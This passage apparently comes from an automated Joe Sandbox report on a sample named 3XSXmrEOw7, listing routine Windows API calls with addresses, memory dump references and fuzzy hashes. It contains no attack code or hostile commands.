                                                                                                                        • UpdateWindow.USER32(?), ref: 00438841
                                                                                                                        • SendMessageA.USER32(?,00000121,00000000,?), ref: 00438865
                                                                                                                        • SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 0043887F
                                                                                                                        • UpdateWindow.USER32(?), ref: 004388C5
                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004388F9
                                                                                                                          • Part of subcall function 00437534: GetWindowLongA.USER32(?,000000F0), ref: 0043753F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2853195852-0
                                                                                                                        • Opcode ID: b13282f9b8ac6db00a8496b55bdebc49f6485c126065f6b24774a09cd2d7802b
                                                                                                                        • Instruction ID: 084587f8be8d29286b758f10d7e9662302e5aba9923b57fea7a2f2edceff8d6b
                                                                                                                        • Opcode Fuzzy Hash: b13282f9b8ac6db00a8496b55bdebc49f6485c126065f6b24774a09cd2d7802b
                                                                                                                        • Instruction Fuzzy Hash: 3E410330208741AFDB25AF26DC44A2BFAF0FFC9B44F50192EF581911A1CB3AC905CA5A
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,0044370A,?,00000000,?,?,?,?,00442F66,00441F83,00442F82), ref: 004434A2
                                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,0044370A,?,00000000,?,?,?,?,00442F66,00441F83,00442F82,0043538D), ref: 004434C0
                                                                                                                        • LocalAlloc.KERNEL32(00000000,?,00000010,?,?,?,?,0044370A,?,00000000,?,?,?,?,00442F66,00441F83), ref: 0044351C
                                                                                                                        • LocalReAlloc.KERNEL32(?,?,00000002,00000010,?,?,?,?,0044370A,?,00000000,?,?,?,?,00442F66), ref: 0044352E
                                                                                                                        • LeaveCriticalSection.KERNEL32(0047EB28,?,?,?,?,0044370A,?,00000000,?,?,?,?,00442F66,00441F83,00442F82,0043538D), ref: 0044353B
                                                                                                                        • TlsSetValue.KERNEL32(?,00000000), ref: 0044356B
                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,0044370A,?,00000000,?,?,?,?,00442F66,00441F83,00442F82,0043538D), ref: 0044358C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$AllocLeaveLocalValue$Enter
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 784703316-0
                                                                                                                        • Opcode ID: eec5c9af0761aab35826935f94150f19e31b1a8781ee2cce32ef685509deae95
                                                                                                                        • Instruction ID: c920ea616b6941ccf4a41ae28c234557be8e43c86538256f6915913f71204ac3
                                                                                                                        • Opcode Fuzzy Hash: eec5c9af0761aab35826935f94150f19e31b1a8781ee2cce32ef685509deae95
                                                                                                                        • Instruction Fuzzy Hash: 2F31ABB1500615BFEB24EF55D885C6ABBA8FB057117108A2EE81683610CB34FE50CB99
                                                                                                                        APIs
                                                                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00422D73
                                                                                                                        • GetSystemMetrics.USER32(00000000), ref: 00422D8B
                                                                                                                        • GetSystemMetrics.USER32(00000001), ref: 00422D92
                                                                                                                        • lstrcpynA.KERNEL32(?,DISPLAY,00000020), ref: 00422DB8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: System$Metrics$InfoParameterslstrcpyn
                                                                                                                        • String ID: B$DISPLAY
                                                                                                                        • API String ID: 2307409384-3316187204
                                                                                                                        • Opcode ID: 9cba5b6c645de5270ad7bb0fc0d991fcef33e3317d4237bbf04082c5b1e7876e
                                                                                                                        • Instruction ID: 3a1a5f33e973a52794829ba86540b2c4864c641d0816d9ff10fb2a82ff3ca36e
                                                                                                                        • Opcode Fuzzy Hash: 9cba5b6c645de5270ad7bb0fc0d991fcef33e3317d4237bbf04082c5b1e7876e
                                                                                                                        • Instruction Fuzzy Hash: 6111A371710334BBCF119F64AD8475BBBA9FF06B50B808466FD05AA145C2F4D801CBA9
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00413B40: LoadLibraryA.KERNEL32 ref: 00413B5A
                                                                                                                          • Part of subcall function 00413B40: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00413B6A
                                                                                                                          • Part of subcall function 00413B40: GetSystemDirectoryA.KERNEL32(0045DAF8,00000104), ref: 00413B95
                                                                                                                          • Part of subcall function 00413B40: GetWindowsDirectoryA.KERNEL32(0045DD08,00000104), ref: 00413BA5
                                                                                                                          • Part of subcall function 00413B40: GetTempPathA.KERNEL32(00000104,0045DE10), ref: 00413BB5
                                                                                                                        • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004149A7
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CopyFileExA), ref: 004149BC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressDirectoryLibraryLoadProc$PathSystemTempWindows
                                                                                                                        • String ID: %s\%s$CopyFileExA$KERNEL32.DLL$regsvr32.exe
                                                                                                                        • API String ID: 497994091-3394410207
                                                                                                                        • Opcode ID: f1068f767d1700a680734e17c4b62072ec67806eae000909974e6ca04aa6b552
                                                                                                                        • Instruction ID: dbb7616a5e8e18c7340fb9c6e1b10d6890d2dd053081ddfc01aae21a589600a4
                                                                                                                        • Opcode Fuzzy Hash: f1068f767d1700a680734e17c4b62072ec67806eae000909974e6ca04aa6b552
                                                                                                                        • Instruction Fuzzy Hash: 6B112570108340AFD318DF54DC06BDA7BA4E745B15F400A2EB595932D2EB7C5144CB5A
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,0043D1B4,?,?,?,?,774D0A60,00000000,?,00425801,00000000), ref: 00443AF5
                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,00425801,00000000), ref: 00443AFD
                                                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,00425801,00000000), ref: 00443B48
                                                                                                                        • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 00443B58
                                                                                                                          • Part of subcall function 0044399E: GetModuleFileNameA.KERNEL32(?,?,00000104,?,?), ref: 004439DF
                                                                                                                          • Part of subcall function 0044399E: PathFindExtensionA.SHLWAPI(?), ref: 004439F9
                                                                                                                          • Part of subcall function 0044399E: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 00443A93
                                                                                                                          • Part of subcall function 0044399E: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 00443AC0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorModeModule$AddressExtensionFileFindHandleNamePathProclstrcatlstrcpy
                                                                                                                        • String ID: NotifyWinEvent$user32.dll
                                                                                                                        • API String ID: 4004864024-597752486
                                                                                                                        • Opcode ID: eced104bb2dd26ae009b150a134447d401b323aa7f3da8792df851434d666933
                                                                                                                        • Instruction ID: dbd96a4b6eaa2b3b5d1619ca9b628c41ce02e38444e38533f865fee5f1778688
                                                                                                                        • Opcode Fuzzy Hash: eced104bb2dd26ae009b150a134447d401b323aa7f3da8792df851434d666933
                                                                                                                        • Instruction Fuzzy Hash: BE018B74A003515FE710AF25D849B0E3BE8AF44B05F0684AFF448C7262DB78D945CB6E
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004318D6: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00431948
                                                                                                                        • __allrem.LIBCMT ref: 004295EA
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042960B
                                                                                                                        • __allrem.LIBCMT ref: 00429627
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042964A
                                                                                                                        • __allrem.LIBCMT ref: 00429666
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00429689
                                                                                                                          • Part of subcall function 0042DE95: __lock.LIBCMT ref: 0042DEA3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$__lock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1282128132-0
                                                                                                                        • Opcode ID: 2b8efb0c4cd6615b4bf4a7a735cd704fbe2f32d7777add60ba098c4bbfda7f1b
                                                                                                                        • Instruction ID: 20045b1a01943ce18175a09da68eb3b3dac957ec16cd292ee12873f349e9aca1
                                                                                                                        • Opcode Fuzzy Hash: 2b8efb0c4cd6615b4bf4a7a735cd704fbe2f32d7777add60ba098c4bbfda7f1b
                                                                                                                        • Instruction Fuzzy Hash: B861E171B00215AFDB28CF69E88096EBBF5FB44314F64812FE055D3291E738AE85CB18
                                                                                                                        APIs
                                                                                                                        • GetStringTypeW.KERNEL32(00000001,0044D18C,00000001,?,0044D190,0000001C,0042CD7C,00000001,?,00000001,?,?,?,00000001), ref: 0042C3D4
                                                                                                                        • GetLastError.KERNEL32(?,?,0042C39D,?,?,00000008,?,?,00424C62,?,?,?,?,00402BBF), ref: 0042C3E6
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0044D190,0000001C,0042CD7C,00000001,?,00000001,?,?,?,00000001), ref: 0042C448
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,?,00000000), ref: 0042C4C6
                                                                                                                        • GetStringTypeW.KERNEL32(?,?,00000000,?,?,00000000), ref: 0042C4D8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiStringTypeWide$ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3581945363-0
                                                                                                                        • Opcode ID: 690c7f7e2a6415bf22f53cae1791a707fe08a0ab16c1c026983f3b201c6f3da1
                                                                                                                        • Instruction ID: 88f62cd8e99c40129225232f1d9a33b4d453174d8dbd23392fe9350ab2a232bf
                                                                                                                        • Opcode Fuzzy Hash: 690c7f7e2a6415bf22f53cae1791a707fe08a0ab16c1c026983f3b201c6f3da1
                                                                                                                        • Instruction Fuzzy Hash: 48410471A00234ABCB229F50EC85AEF3B74FF49B54F60451AF800A7250D738DD91CB98
                                                                                                                        APIs
                                                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 0043EA91
                                                                                                                        • GetParent.USER32(?), ref: 0043EA9F
                                                                                                                        • GetParent.USER32(?), ref: 0043EAB2
                                                                                                                        • GetLastActivePopup.USER32(?), ref: 0043EAC1
                                                                                                                        • IsWindowEnabled.USER32(?), ref: 0043EAD6
                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 0043EAE9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
